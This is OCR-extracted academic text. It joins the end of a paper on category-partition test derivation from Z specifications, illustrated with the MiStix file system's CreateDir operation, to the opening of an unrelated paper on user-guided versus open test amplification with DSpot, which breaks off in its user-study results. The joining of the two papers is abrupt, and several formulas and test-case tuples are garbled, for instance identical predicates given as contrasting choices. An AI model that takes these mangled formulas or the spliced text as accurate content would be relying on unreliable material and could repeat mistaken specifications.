here has the leaf elements at the tail of the sequence, and so, for example, the representation of “/usr/bin/foo” is the sequence \langle \text{usr}, \text{bin}, \text{foo} \rangle. We use the sequence manipulation functions \texttt{front}, which yields a subsequence up to the last element (e.g., \texttt{front}((\text{usr}, \text{bin}, \text{foo})) = (\text{usr}, \text{bin})) and \texttt{last}, which yields the element at the end of the sequence (e.g., \texttt{last}((\text{usr}, \text{bin}, \text{foo})) = \text{foo}). 5.1 State Description The state of \texttt{FileSystem} is represented by the directories in the system \texttt{(dirs)}, the files \texttt{(files)}, and a current working directory \texttt{(cwd)}. The Z schema for \texttt{FileSystem} is as follows: \[ \begin{array}{l} \text{FileSystem} \\ \text{files : P FullName} \\ \text{dirs : P FullName} \\ \text{cwd : FullName} \\ \forall f : \text{files} \cup \text{dirs} \bullet f \neq \langle \rangle \Rightarrow \text{front } f \in \text{dirs} \\ \text{cwd } \in \text{dirs} \end{array} \] \texttt{FileSystem} has three components in its signature, \texttt{files}, \texttt{dirs}, and \texttt{cwd}, and two invariants in the predicate. The first component, \texttt{files}, is the set of files that currently exist in the system. (The P in \texttt{P FullName} is the powerset constructor and is read \textit{“set of”}.) The second component, \texttt{dirs}, is the set of directories that currently exist in the system. The last component, \texttt{cwd}, does not record any permanent feature of the file system, but is instead used to mark a user’s current working directory. The first invariant states that, with the exception of the root directory \langle \rangle, for a file or directory to exist, it must be in a valid directory. (As a note on Z notation, the \bullet in the first invariant may be read, “it is the case that”.) The second invariant states that \texttt{cwd} must be an existing directory. Note that there is no constraint that prohibits files and directories from sharing the same name, although such a constraint might be desirable and could be easily added, by including a third predicate \texttt{files} \cap \texttt{dirs} = \langle \rangle. 5.2 Example MiStix Operation By way of example, we give the specifications for one representative operation, \texttt{CreateDir}. The English specification for the operation \texttt{CreateDir} is as follows: \begin{itemize} \item \texttt{CreateDir} \texttt{n}? \end{itemize} If the name \texttt{n} is not already in the current directory, create a new directory called \texttt{n} as a subdirectory of the current directory, else print an appropriate error message. The Z formal specification for \texttt{CreateDir} is as follows (the specification for the error message has been omitted here): CreateDir modifies the state of the file system (hence the $\Delta FileSystem$), and takes the new directory name, $n^?$, as an input. The first predicate, the precondition for the operation, is that the directory to be created, the concatenation of the current working directory with the new name ($cwd \sim \langle n^? \rangle$), does not already exist. The second predicate, the postcondition, adds the new directory to the set $dirs'$. Remember that $dirs'$ denotes the value of the $dirs$ environment variable after execution of the operation. Note that we do not need to specify that $cwd$ is valid, since the $FileSystem$ predicates ensure that. 5.3 Tests For CreateDir In this section we apply the method of Amla and Ammann [AA92] to part of MiStix. The remainder of the test specification for MiStix is similar, although lengthy, and can be found in the technical report [AO83]. The first step in category-partition testing (as given in section 2) is to identify the testable units, which in this case include CreateDir. The second step is identification of the inputs and environment (state) variables for CreateDir. From the syntax of the operation, it is clear that $n^?$ of type $Name$ is the explicit input and that $dirs$ and $cwd$ are the state variables of interest. Formally, we can describe the input domain for CreateDir with the schema: \[ \begin{align*} \text{CreateDir Input Domain} \\ \Delta FileSystem \\ n^?: Name \end{align*} \] Note that the schema $FileSystem$ includes both the declarations for $dirs$ and $cwd$ and also constraints on the values $dirs$ and $cwd$ can take. \(^2\) The third step is the identification of the categories, or important characteristics of the inputs. One source of categories is preconditions on operations. Preconditions are good sources for categories because they are precisely the predicates on the domain of a testable unit that distinguish normal operation from undefined or erroneous operation. For CreateDir, the precondition is that the directory to be created does not already exist. Two choices for a category based on the precondition are that the directory to be created does not yet exist and that it already exists. Another source of categories is revealed by examining other parts of the MiStix specification and noting that variables of type $Name$ can assume two special values. One special value, which we denote $PARENT$, is the value of $n^?$ used when referring to the parent directory. The special value $PARENT$ corresponds to the "." in Unix filename specifications. The behavior of CreateDir with respect to a request to create a file named $PARENT$ is technically allowed by the formal specification, but clearly represents a case that should be disallowed. This is an advantageous side effect of deriving test frames in this manner; deriving test data based on the functional specifications can lead the test engineer to identifying anomalies in the specifications themselves. Another special value of type $Name$, which we denote $ROOT$, is the value of $n^?$ used when referring to the root directory. The special value $ROOT$ corresponds to the empty string. The schema for CreateDir suggests two more categories. One is based on whether the current working directory ($cwd$) is the empty sequence (i.e. root). The empty sequence is a typical special case for sequences. The last category we employ is the state of the directories set ($dirs$). The motivation for this category is that if it matters if $cwd$ is the empty sequence (root), $cwd$ would always be root if the only existing directory is the root directory. The fourth step is partitioning the categories, some aspects of which have already been discussed. The test specifications for CreateDir after the first four steps of the category-partition method are: --- **Functional Unit:** CreateDir **Inputs:** \[ n^?: Name \] **Environment Variables:** \[ dirs : P FullName \\ cwd : FullName \] --- \(^2\)Since $files$ is neither examined nor changed in CreateDir, $files$ is not a relevant state variable to the operation. As a technical point, we could capture this fact by using the $Z$ schema hiding operator to hide the variable $files$ in the schema $CreateDir Input Domain$, but we elect not to do so for the remainder of the example. Categories: Category - Precondition - Choice 1 (Base): \( \text{cwd} \neg \{n\} \notin \text{dirs} \) - Choice 2: \( \text{cwd} \neg \{n\} \notin \text{dirs} \) Category - Type of \( n \) - Choice 1 (Base): \( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \) - Choice 2: \( n? = \text{ROOT} \) - Choice 3: \( n? = \text{PARENT} \) Category - Type of \( \text{cwd} \) - Choice 1 (Base): \( \text{cwd} \neq \{\} \) - Choice 2: \( \text{cwd} = \{\} \) Category - Type of \( \text{dirs} \) - Choice 1 (Base): \( \text{dirs} \neq \{\} \) - Choice 2: \( \text{dirs} = \{\} \) 5.3.1 Creating The Combination Matrix The combination matrix is a conceptual tool; only those combinations of choices that are selected need be explicitly enumerated. The combination matrix for \( \text{CreateDir} \) has four dimensions, one for each category. There are \( 2 \times 3 \times 2 \times 2 = 24 \) entries in the combination matrix for \( \text{CreateDir} \). 5.3.2 Identifying The Base Test Frame To identify a base test frame, a base choice is selected for each category. The normal case for \( \text{CreateDir} \) is the case where the directory to be created does not yet exist and is neither \( \text{ROOT} \) nor \( \text{PARENT} \), where the current working directory is not the \( \text{ROOT} \) directory, and where the directory set contains more than just the \( \text{ROOT} \) directory. The indications of base choices are indicated by the word “Base” in the test specification for \( \text{CreateDir} \). For brevity, the choices in the test specification are listed as predicates only, although a more complete description is with a set of variable declarations and predicates on those variables, i.e., with a schema, as done by Stocks and Carrington [SC93a, SC93b]. Note that the invariant from \( \text{FileSystem} \), which describes the set of valid states for the file system, must hold for every choice. The base test frame is the intersection of the base choice for each category, and this is succinctly expressed with the scheme conjunction of the base schema for each category. For \( \text{CreateDir} \) the base test frame is the schema:\(^3\) \[ \text{CreateDir}_{\text{Base Test Frame}} \] \[ \text{FileSystem} \] \[ n? : \text{Name} \\ \text{cwd} \neg \{n\} \notin \text{dirs} \\ n? \neq \text{ROOT} \land n? \neq \text{PARENT} \\ cwd \neq \{\} \\ dirs \neq \{\} \] The source of each of the explicitly listed predicates in \( \text{CreateDir}_{\text{Base Test Frame}} \) is as follows. The predicate \( \text{cwd} \neg \{n\} \notin \text{dirs} \) comes from the schema that is Choice 1 (Base) for Category - Precondition. Similarly, the predicate \( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \) comes from the schema that is Choice 1 (Base) for Category - Type of \( n \), and so on. 5.3.3 Choosing Other Combinations Applying the heuristic from section 4 to the \( \text{CreateDir} \) operation of \textbf{MiStix} gives a total of six test frame schemas, the base test frame schema (shown above in \( \text{CreateDir}_{\text{Base Test Frame}} \)) and five additional variations, one for each non-base choice. In the interest of compactness we omit the declaration part of the test frame schemas and only list the predicate parts from the choices. Note that since each test frame schema includes \( \text{FileSystem} \), each predicate part of a test frame schema listed below also includes the state invariant from \( \text{FileSystem} \), even though that predicate is not explicitly listed. Base Test Frame Test Frame 1: The Base Test Frame schema, \( \text{CreateDir}_{\text{Base Test Frame}} \) is shown above. Test Frame From Category - Precondition Test Frame 2: \( \text{cwd} \neg \{n\} \in \text{dirs} \land \) \( n? \neq \text{ROOT} \land n? \neq \text{PARENT} \land \) \( \text{cwd} \neq \{\} \land \) \( \text{dirs} \neq \{\} \) Test Frames From Category - Type of \( n \) Test Frame 3: \( \text{cwd} \neg \{n\} \notin \text{dirs} \land \) \( n? = \text{ROOT} \land \) \( \text{cwd} \neq \{\} \land \) \( \text{dirs} \neq \{\} \) Test Frame 4: \( \text{cwd} \neg \{n\} \notin \text{dirs} \land \) \( \text{CreateDir}_{\text{Base Test Frame}} \) declares the variables \( \text{dirs} \) and \( \text{cwd} \) and supplies the state invariants on these variables. \(^3\)Note that the schema inclusion of \( \text{FileSystem} \) in 8 \[ \begin{align*} n? &= \text{PARENT} \land \\ cwd &\neq \emptyset \land \\ dirs &\neq \{()\} \end{align*} \] Test Frame From Category - Type of dirs Test Frame 5: \[ \begin{align*} cwd &\sim (n?) \notin \text{dirs} \land \\ n? &\neq \text{ROOT} \land n? \neq \text{PARENT} \land \\ cwd &\neq \emptyset \land \\ dirs &\neq \{()\} \end{align*} \] Test Frame From Category - Type of cwd Test Frame 6: \[ \begin{align*} cwd &\sim (n?) \notin \text{dirs} \land \\ n? &\neq \text{ROOT} \land n? \neq \text{PARENT} \land \\ cwd &\neq \emptyset \land \\ dirs &\neq \{()\} \end{align*} \] Note the source of each of the four explicitly listed predicates in a given test frame schema listed above. Predicates are mechanically derived as for those in \textit{CreateDir Base Test Frame}. Specifically, each predicate is a choice from one of the four categories for \textit{CreateDir}. For any given test frame schema, one predicate corresponds to a non-base choice; remaining predicates correspond to base choices. 5.3.4 Identifying Infeasible Combinations Test Frame 5, developed above for \textit{CreateDir}, is, in fact, infeasible. The conjuncts \[ \begin{align*} dirs &= \{()\} \land \\ cwd &\neq \emptyset \end{align*} \] along with the invariant relation from \textit{FileSystem}, \[ cwd \in \text{dirs} \] simplify to \textit{false}. Informally, if the root directory is the only directory, then \textit{cwd} must be set to the root directory. We demonstrate the utility of the combination matrix by showing the entries for the Type of dirs \times Type of cwd part of the combination matrix: <table> <thead> <tr> <th>Type of dirs</th> <th>Type of cwd</th> <th>Base</th> <th>Root Only</th> </tr> </thead> <tbody> <tr> <td>Base</td> <td>1</td> <td></td> <td></td> </tr> <tr> <td>Root</td> <td>2</td> <td>3</td> <td></td> </tr> </tbody> </table> The empty cell represents the combination of choices for Test Frame 5 where there is only one directory, the root directory, and it contains no subdirectories \((\text{dirs} = \{<>\})\), and the current working directory \((\text{cwd})\) is some non-root, e.g. /a. We revise Test Frame 5 by shifting to a different cell in the combination matrix, namely the cell labeled 3, where \textit{cwd} is \text{ROOT}. As a result, we get a revised Test Frame 5 (listed in full schema form): \[ \begin{align*} \text{createDir} \text{Revised Test Frame 5} \\ \text{FileSystem} \\ n? : \text{Name} \\ cwd &\sim (n?) \notin \text{dirs} \land \\ n? &\neq \text{ROOT} \land n? \neq \text{PARENT} \\ cwd &= \emptyset \\ dirs &= \{()\} \end{align*} \] 5.3.5 Refining Test Frames Into Test Cases Refining the test frames into test cases is the process of selecting a representative input from the set of inputs that satisfy the selected choices. In previous work such as Demillo and Offutt [DO91], the refinement may be based purely on the syntax of the constraints and the types of the variables, whereas in a sophisticated system such as the one proposed by Wild et al. [WZFC92], such a refinement might be based on a knowledge base incorporating other project specific data. Since refinement is not the focus of our present work, we simply present sample test inputs that satisfy the necessary constraints. Each test input is a triple of \((n?, dir, cwd)\). All Base Choice Test Case 1: \((b, \langle>, \langle a\rangle, \langle a\rangle)\) Non-Base Precondition Choice Test Case 2: \((b, \langle>, \langle a\rangle, \langle b\rangle, \langle a\rangle)\) Non-Base Type of n? Choice Test Case 3: \((\text{PARENT}, \langle>, \langle a\rangle, \langle a\rangle)\) Test Case 4: \((\text{ROOT}, \langle>, \langle a\rangle, \langle a\rangle)\) Non-Base Type of dirs Choice Test Case 5: \((b, \langle>, \langle a\rangle)\) Non-Base Type of cwd Choice Test Case 6: \((b, \langle>, \langle a\rangle)\) 5.3.6 Writing Operation Commands The actual test case commands must use the parameters specified by the values of the test cases in a syntactically correct command to the system being tested. This is a straightforward process that could be automated by using the formal specification of the command. For cell 1 in the above example, the operation is: \text{Operation: CreateDir b} 5.3.7 Creating Test Scripts A test script is derived from a matrix entry by taking the corresponding setup script, creating the syntax for the test operation, and appending the verify and cleanup scripts. A test script for cell 1 from the above matrix is: - **Setup:** - CreateDir a - ChangeDir a - **Operation:** ... - **Verify:** List - **Cleanup:** Logoff 5.4 Results of Testing MiStix To demonstrate the feasibility of our technique, we generated and executed a complete set of test data for the MiStix system. The implementation is about 900 lines of C source in three separate modules. We derived 72 test cases for the ten operations, of which 5 were duplicates. Some of the test cases were also superseded by others in the sense that they were prefixes of the other test cases. We did not eliminate these tests (although an automated tool to support this process could easily do so). The MiStix system contained 10 known faults, of which 7 were detected. 6 Conclusions Test specifications are an important intermediate representation between functional specifications and functional tests. In general, it is desirable to know the extent to which a test specification can be derived from the functional specification and the extent to which the tester must rely on information external to the specification. In this paper we have helped to answer this question by presenting a procedure that will guide the tester when creating complete functional tests from functional specifications. It is unreasonable to expect to derive a test specification completely from the functional specifications. For example, the test engineer might know that programmers often make the mistake of using fixed-sized structures when dynamically-sized structures are required. For example, in the specification for MiStix, the depth of the directory tree is not constrained by the Z specifications. The lack of an explicit statement makes it difficult to derive an appropriate category (e.g., directory tree depth). However, to a typical human test engineer, limits on directory depth is a relatively obvious property to check (and indeed such a check can lead to tests that discover faults not found by the generated test specification). Thus the role of mechanically generated test specifications as identified here is to relieve the burden of routine tasks and free the test engineer to concentrate on more creative tasks. Previous category-partition papers have offered relatively little guidance as to which combinations of choices should be tested. In this paper we have defined the base-choice coverage criterion, and demonstrated the feasibility of applying the criterion to an example specification. Some choices are designated as "base" choices. A base test frame uses all the base choices. Other test frames are generated by systematic enumeration over all non-base choices. This technique is relatively inexpensive (linear in the number of choices) and ensures that each choice will be used in at least one test case (if feasible). In future work we intend to investigate the feasibility of the base-choice coverage criterion for categories derived from other sources than those investigated here. Acknowledgements It is a pleasure to acknowledge Tom Ostrand for his helpful comments and encouragement on the application of formal methods to category-partition testing. We are also grateful to Steve Zeil for explaining the utility of Z schemas as test frame descriptors. References
{"Source-Url": "http://ix.cs.uoregon.edu/~michal/Classes/W98/Readings/Ammann-CPtest.pdf", "len_cl100k_base": 9920, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 43669, "total-output-tokens": 11686, "length": "2e13", "weborganizer": {"__label__adult": 0.00031757354736328125, "__label__art_design": 0.00035858154296875, "__label__crime_law": 0.00027370452880859375, "__label__education_jobs": 0.0012874603271484375, "__label__entertainment": 6.002187728881836e-05, "__label__fashion_beauty": 0.0001671314239501953, "__label__finance_business": 0.00017583370208740234, "__label__food_dining": 0.000293731689453125, "__label__games": 0.0005550384521484375, "__label__hardware": 0.0006594657897949219, "__label__health": 0.0004062652587890625, "__label__history": 0.00017654895782470703, "__label__home_hobbies": 8.7738037109375e-05, "__label__industrial": 0.0002837181091308594, "__label__literature": 0.0003614425659179687, "__label__politics": 0.00016987323760986328, "__label__religion": 0.0003714561462402344, "__label__science_tech": 0.013580322265625, "__label__social_life": 9.79304313659668e-05, "__label__software": 0.007114410400390625, "__label__software_dev": 0.97265625, "__label__sports_fitness": 0.0002187490463256836, "__label__transportation": 0.0003330707550048828, "__label__travel": 0.0001513957977294922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45703, 0.01702]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45703, 0.5352]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45703, 0.85388]], "google_gemma-3-12b-it_contains_pii": [[0, 3686, false], [3686, 8394, null], [8394, 13051, null], [13051, 18042, null], [18042, 22577, null], [22577, 26312, null], [26312, 30622, null], [30622, 35018, null], [35018, 39190, null], [39190, 43418, null], [43418, 45703, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3686, true], [3686, 8394, null], [8394, 13051, null], [13051, 18042, null], [18042, 22577, null], [22577, 26312, null], [26312, 30622, null], [30622, 35018, null], [35018, 39190, null], [39190, 43418, null], [43418, 45703, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45703, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45703, null]], "pdf_page_numbers": [[0, 3686, 1], [3686, 8394, 2], [8394, 13051, 3], [13051, 18042, 4], [18042, 22577, 5], [22577, 26312, 6], [26312, 30622, 7], [30622, 35018, 8], [35018, 39190, 9], [39190, 43418, 10], [43418, 45703, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45703, 0.00957]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
aae9b8bd44d9a6b4237c9404bdfa032f572788fb
When to Let the Developer Guide: Trade-offs Between Open and Guided Test Amplification Carolin Brandt, Danyao Wang, Andy Zaidman Delft University of Technology c.e.brandt@tudelft.nl, wangdanyaoa@gmail.com, a.e.zaidman@tudelft.nl Abstract—Test amplification generates new tests by mutating existing, developer-written tests and keeping those tests that improve the coverage of the test suite. Current amplification tools focus on starting from a specific test and propose coverage improvements all over a software project, requiring considerable effort from the software engineer to understand and evaluate the different tests when deciding whether to include a test in the maintained test suite. In this paper, we propose a novel approach that lets the developer take charge and guide the test amplification process towards a specific branch they would like to test in a control flow graph visualization. We evaluate whether simple modifications to the automatic process that incorporate the guidance make the test amplification more effective at covering targeted branches. In a user study and semi-structured interviews we compare our user-guided test amplification approach to the state-of-the-art open test amplification approach. While our participants prefer the guided approach, we uncover several trade-offs that influence which approach is the better choice, largely depending on the use case of the developer. Index Terms—Software Testing, Test Amplification, Automated Test Code Modification, User-centric Design, Human-Automation Interaction I. INTRODUCTION Software testing is one of the central activities in the software development lifecycle [1]. One part of this are developer tests, i.e., small automated programs that software developers write to check that their code behaves as they intend and prevent it from breaking in the future [2]. While developer testing is widely seen as valuable, it is also a tedious and time-consuming activity [3]. One automated approach to relieve developers of this manual effort is test amplification. Test amplification mutates existing, developer-written tests to explore new behavior of the code under test [4]. Previous studies have shown that it can provide valuable tests to developers [5]–[7], but at the cost of long runtimes [5], [7] and effort for the developers to understand the behavior and impact of the amplified tests [7]–[9]. Let us illustrate this with an example: Masha, a software developer, is working on a new feature of their software project, that requires small changes in their existing code. Before submitting a patch, she needs tests that cover all her new code, so she decides to use test amplification to generate them automatically. She picks an existing test from the class she worked on and asks the tool to create new tests based on it. After a while the tool reports back and proposes several tests to her. Unfortunately, the class did not have a high test coverage, so she has to sift through quite a few tests spending time to understand what code they cover and realize it is not the code she is concerned with. Even for the tests that target her code, she has to switch between several methods under test and every time recall what behavior this method should have, so she can judge whether the generated test is correct. Our hypothesis is that these understandability issues are in part rooted in the disconnect between the present point of interest of a developer in the code base, and the dispersed coverage contributions amplified tests are providing, i.e., they need to rebuild the task context [10]. To bridge this disconnect, we propose to involve the software developer more tightly in the test amplification process. Ideally, they can convey what piece of code they are interested in to test and then the test amplification presents only those tests that are relevant for the focus of the developer. In this paper, we propose a novel approach of user-guided test amplification. Starting from a method in their code base, the developer can initiate the test amplification and choose in a visualized control-flow graph which branch of the method should be tested. The test amplification is then directed to call this method specifically, and generates a variety of tests for it. It measures the tests’ branch coverage and presents all tests that cover the intended branch to the developer, using the same control-flow graph visualization to help the developer understand how the test executes the method under test. We conduct a technical case study and a user study to understand the impact and potential use of user-guided test amplification.¹ In both studies we compare it to the existing test amplification approach [6], [7], which we will call open test amplification for a clearer distinction. With our technical case study on 31 classes from two open source projects, we investigate whether our simple changes in the guided amplification process are indeed effective at producing a higher ratio of tests for the targeted branch, and whether to guidance enables us to cover more branches overall in a project. Our findings from this study answer our first research question: ¹We follow the empirical standard for engineering research: https://acmsigsoft.github.io/EmpiricalStandards/docs/?standard=EngineeringResearch RQ1: How effective does guided test amplification generate tests for targeted branches (compared to open test amplification)? In our user study, 12 developers apply both approaches to two classes and we interview them about their experiences. From this, we learn how they perceive each technique and their considerations when comparing them to each other. Our observations address our second research question: RQ2: How do developers perceive guided test amplification (compared to open test amplification)? Our two evaluation studies show that user-guided test amplification does deliver on the intended goals of making the test amplification process more effective and the coverage of the amplified tests easier to understand. However, the studies also show that the user-guided version of test amplification is not always better. From the participant’s explanations during the interviews we learned that user-guided test amplification is closer to the real-life process of developing and testing new code where the developer focuses on a specific feature, writing code and tests for it. On the other hand, open test amplification is more suited when focusing on improving the test suite for an already existing code base, as it connects new tests clearer to the already existing tests. This is one example of the trade-offs between open and user-guided test amplification that our studies make apparent. We discuss all trade-offs we encountered to help the reader understand the strengths and weaknesses of both approaches, and to help developers choose which approach fits best to their goals and workflow. II. TEST AMPLIFICATION In this section, we introduce the concept of (open) test amplification, which is realized in the state-of-the-art test amplification tool for Java called DSpot [7]. The aim of test amplification is to generate new tests by leveraging the knowledge in existing, human-written tests [4]. These new tests improve the existing test suite with respect to a defined engineering goal, e.g., structural coverage or mutation score. Our work is based on Brandt and Zaidman’s proposal of developer-centric test amplification, which focuses on generating short and easy-to-understand tests to be included into the developer’s maintained code base [7]. A central part of Brandt and Zaidman’s proposal is to combine the automatic test amplification with a test exploration tool that guides the developer’s interaction with the test amplification. Fig. 1 illustrates the workflow with their prototype in form of an IDE plugin. ![Interaction with Brandt and Zaidman’s test exploration IDE plugin for open test amplification](image) **Fig. 1:** Interaction with Brandt and Zaidman’s test exploration IDE plugin for open test amplification [7]. to the existing test suite and presents them to the developer. The developer starts by selecting a method in the code under test which they would like to test (see 1 in Fig. 2). Then, the test exploration tool presents them with a control flow graph of that method, similar to the graph shown at 2. The graph shows the execution structure of the method through boxes for each statement and condition, connected with arrows. The arrows annotated with “True” or “False” represent branches in the control flow of the method, letting the developer see the different scenarios that might need testing. We compute the existing test coverage for the method and highlight the branches that are already covered in green, and those that are not covered in red. The developer can select the branch that they would like to cover and start the test amplification. The tool automatically looks for the corresponding test class and picks the first—often most simple—test as the original test for the amplification. If no corresponding test class or test can be found, the tool prompts the user to create a test and invoke the amplification again. When inspecting the result, the test exploration tool reuses the same control flow graph to show the developer the additional coverage that the amplified test provides 3. The developer can then decide whether to add the test to the test suite or to continue exploring the other tests or invoke the tool again for other branches. We add two simple modifications to the underlying automated test amplification process to incorporate the guidance provided by the developer. The lower half of Fig. 3 illustrates the modifications we make to the open test amplification process. As the first modification to the input of the original test, we call the method selected by the developer with randomly generated values for the parameters. When an object is needed, DSpot looks for a public constructor and uses it with random values to initialize the object. Then we continue by randomly mutating the test input as with open test amplification. All produced tests that cover the branch selected by the developer... are selected as results to be presented to the developer. We intentionally make simple modifications and largely rely on the amplification operators available in the base tool DSpot, e.g., the random generation of parameter values for object initialization. Our aim is to see whether such simple changes can already be effective to improve test amplification before considering more complex and runtime-impacting alternatives. IV. Evaluation To evaluate our proposed user-guided test amplification, we conduct two comparative studies: a technical case study and a user study. Our first goal is to judge the effectiveness of our technical changes to the test amplification process: does the guidance lead to a larger proportion of the generated tests covering the targeted branch compared to using open test amplification (RQ1)? The second goal is to elicit the opinions of developers on interacting with user-guided and open test amplification (RQ2). RQ1: How effective does guided test amplification generate tests for targeted branches (compared to open test amplification)? RQ2: How do developers perceive guided test amplification (compared to open test amplification)? To answer RQ1 we conduct a technical case study, where we apply both approaches to generate tests for 100 branches sampled from 31 classes of two open source projects. We analyze the ratio of amplified tests fulfilling our coverage goals to determine which approach is more effective. To answer RQ2 we perform a user study with 12 developers that apply both open and guided test amplification to test two classes. Then we interview each participant to elicit their impression of each approach and how they compare to each other. A. Design Technical Case Study In our technical case study, we sample code branches from two open source projects and apply both guided and open test amplification to try to cover them. We measure how many branches can be covered at all by each approach, and what percentage of the amplified tests generated in one run cover the targeted branch. We select two open source projects as study objects: Javapoet ², a library to generate java source files, and Stream-lib ³, a library for summarizing data in streams. An important selection criterion was the traceability from code to tests: in both projects we can identify the matching test class for a class, because they adhere to consistent naming conventions. To select the targeted methods under test, we pick all classes with a clearly identified test class and from these classes select all public, non-static and non-abstract methods, which are the methods that can be called by DSpot’s amplification operators. Taking all branches from the selected methods under test (160 from Javapoet, 264 from Stream-lib), we randomly sampled 100 branches per project. From their matching test class, we take the first test as the original test method for the amplification. We run both guided and open test amplification for each of the sampled branches, limiting the number of produced tests to 200 per run. Next, we collect all resulting tests as well as their coverage information. Per project, we calculated the ratio of covered branches over the sampled branches (Equation (1)). \[ \text{ratio covered branches} = \frac{\# \text{ branches covered}}{\# \text{ branches sampled}} \] (1) We calculate for each approach per project the average ratio of successful tests (Equation (2)) over all runs. The ratio of successful tests looks at how many of the returned amplified tests do indeed cover the targeted branch. \[ \text{ratio successful tests} = \frac{\# \text{ tests covering branch}}{\# \text{ tests returned}} \] (2) B. Results Technical Case Study Table I shows the calculated effectiveness of guided and open test amplification in comparison. We see that the guided test amplification can cover more branches in both projects, but the difference is small, and neither approach can cover more than 41% of the sampled branches. This shows that guiding the test amplification by explicitly calling the method that contains the targeted branch is only marginally helpful in covering a larger variety of branches of a project. <table> <thead> <tr> <th></th> <th>Javapoet</th> <th>Stream-lib</th> </tr> </thead> <tbody> <tr> <td>Open Test Amplification</td> <td>23%</td> <td>35%</td> </tr> <tr> <td>Guided Test Amplification</td> <td>32%</td> <td>41%</td> </tr> </tbody> </table> To understand why many branches could not be covered by either test amplification approach, we manually inspected the branches that could not be covered. A core reason for not covering a branch was that the objects under test or the target method parameters are not initialized with the right values. In some cases, this came from the amplification tool not supporting the parameter’s type, e.g., for a class without a public constructor. Then, the tool sets the parameters to null or empty values, which lead to exceptions when trying to generate assertions. We saw that Javapoet’s classes have more methods whose parameter types are classes without public constructors, while Stream-lib mostly works with simple data types for the parameters. As the amplification tool’s implementation does not support initializing classes without public constructors, this could explain why the amplification is more effective on Stream-lib than on Javapoet. Similarly, generating tests for faults or locations that require complex input objects is challenging for search-based tools like EvoSuite [11]. We investigated whether the choice of the original test impacts the ability to cover a certain branch. For this, we sampled ten branches that were not covered by the amplification and also not the existing test suites. Then, we amplified all tests in ²https://github.com/square/javapoet ³https://github.com/addthis/stream-lib the corresponding test class, but still could not generate tests that cover the sampled branches. This shows that selecting different initial tests likely does not impact how effective the test amplification is at covering the sampled branches. The earlier mentioned likely cause for not covering the branches, not being able to generate the right initialization for the objects under test, seems to not be solved by selecting different initial tests. Table II shows how many of the tests generated in one run of guided and open test amplification cover the targeted branch. While the ratio of tests that successfully cover the targeted branch with open test amplification is only 24% for Javapoet and 45% for Stream-lib, for guided test amplification this ratio is 70% for both projects. These results show that the guided test amplification is substantially more likely to produce tests that cover the targeted branch. This indicates, that the simple guidance we implemented into the guided test amplification—calling the method containing the targeted branch—is indeed effective at guiding the test amplification towards our target. Therefore, using guided test amplification enables us to set the amplification to generate fewer tests, while still having a good chance at receiving a test that covers the targeted branch. ### Table II: Average ratio of successful tests, which cover the targeted branch (see Equation (2)). <table> <thead> <tr> <th></th> <th>Javapoet</th> <th>Stream-lib</th> </tr> </thead> <tbody> <tr> <td>Open Test Amplification</td> <td>24%</td> <td>45%</td> </tr> <tr> <td>Guided Test Amplification</td> <td>70%</td> <td>70%</td> </tr> </tbody> </table> Looking how the ratio of successful tests is distributed over the sampled, targeted branches (Fig. 4), we see clear differences between the projects. While in Javapoet the distributions are dense and the higher effectiveness of guided test amplification is clearly visible, for the Stream-lib project the ratio of tests successfully covering the targeted branch differs much more significantly from branch to branch. One possible explanation for this difference is that number of methods in Javapoet’s classes is higher than in Stream-lib. This means that it benefits more from the modification in guided test amplification that explicitly calls the method under test before the further input mutation. ### C. Answer to RQ1: How effective does guided test amplification generate tests for targeted branches (compared to open test amplification)? Summarizing the results of our technical case study, we can see that **guided test amplification is more effective than open test amplification** when covering a specific targeted branch. However, both approaches fail to cover the majority of the sampled branches and depending on the project there can be a large variety in the ratio of generated tests covering the targeted for both approaches. We will discuss and interpret these observations together with the insights from our user study in Section V. ### D. Design User Study Our central ideas for guided test amplification were motivated by the interaction with the user: the developer initiates the test amplification and guides it towards a method and branch, reducing the search space for new tests. In addition, this should help the developer understand and review the generated tests, because they already built up the necessary mental task context of the method under test [10]. To elicit the opinions of developers on the use of guided test amplification in comparison to open test amplification, we conduct a study. The user study starts with a questionnaire collecting demographic information and informed consent from each participant. Then, the participants are introduced to the concept of test amplification and asked to generate tests for two classes with similar complexity taken from the open source project Stream-lib. Each developer applied both open and guided test amplification, and we equally shuffled the order of the approaches and which class they test according to the four groups in Table III. After the participant solved both tasks, we conduct a semi-structured interview. Guided by a list of closed questions (see Figs. 5 and 6) we ask the participants to reflect on their experience with the open and guided test amplification, to compare both approaches and to express their overall impression of the amplified tests. We conducted the study fully remotely in sessions of 60 to 90 minutes. We recruited 12 participants through convenience sampling in our professional networks and on social media. You can find the complete tasks and questionnaires in our online appendix [12]. Our study design was approved by our local ethics review board. ### E. Results User Study From the demographic questionnaire, we learn that we have a relatively young population of 12 participants with a development experience of one to three years (7), four to six years (4) and seven to nine years (1). Two of the participants had used an automatic test generation tool before. Their main programming languages were Python (6), Java (4), or C++ (3). 